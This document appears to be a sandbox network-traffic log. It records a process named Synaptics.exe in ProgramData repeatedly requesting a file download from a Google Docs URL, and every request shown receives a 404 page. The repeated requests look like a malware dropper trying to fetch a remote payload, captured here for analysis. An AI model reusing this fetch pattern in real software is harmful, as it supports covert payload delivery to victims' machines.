2022-05-27 02:38:21 UTC | 47 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:22 UTC | 50 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49761 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:22 UTC | 50 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:22 UTC | 53 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:22 UTC | 54 | IN | Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:22 UTC | 54 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dsA2arxck7u2U5qhAr4E-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:22 UTC | 56 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:22 UTC | 56 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49762 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:22 UTC | 56 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:22 UTC | 56 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:22 UTC | 57 | IN | Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:22 UTC | 58 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GoTjizcKOBGRGwE7giIZgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:22 UTC | 59 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:22 UTC | 59 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49763 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:22 UTC | 56 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:22 UTC | 59 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:22 UTC | 60 | IN | Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:22 UTC | 61 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uxH3n6qsdeVxHxiqEFvg1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:22 UTC | 62 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:22 UTC | 62 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49741 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:17 UTC | 6 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:17 UTC | 6 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:17 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:17 UTC | 8 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WZVRGESBti0-bC3FHIppcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:17 UTC | 9 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:17 UTC | 9 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49764 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:22 UTC | 59 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:22 UTC | 62 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:22 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:22 UTC | 64 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JjyestReKDUHk4mbM1FZow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:22 UTC | 65 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:22 UTC | 65 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.3 | 49765 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:22 UTC | 65 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:23 UTC | 65 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:23 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:23 UTC | 67 | IN | Data Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:23 UTC | 67 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LeWMoGB--_KAeopU33bojw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:23 UTC | 68 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:23 UTC | 68 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49766 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:22 UTC | 65 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:23 UTC | 68 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:23 UTC | 70 | IN | Data Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:23 UTC | 70 | IN
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jZZUsfKVxcF-KtVNwQ9-lQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:23 UTC | 71 | IN
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:23 UTC | 71 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49767 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:23 UTC | 68 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:23 UTC | 71 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:23 UTC | 73 | IN
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X3IGjGNMuI5AT021HdRqHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:23 UTC | 74 | IN
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:23 UTC | 74 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.3 | 49768 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:23 UTC | 74 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:23 UTC | 75 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
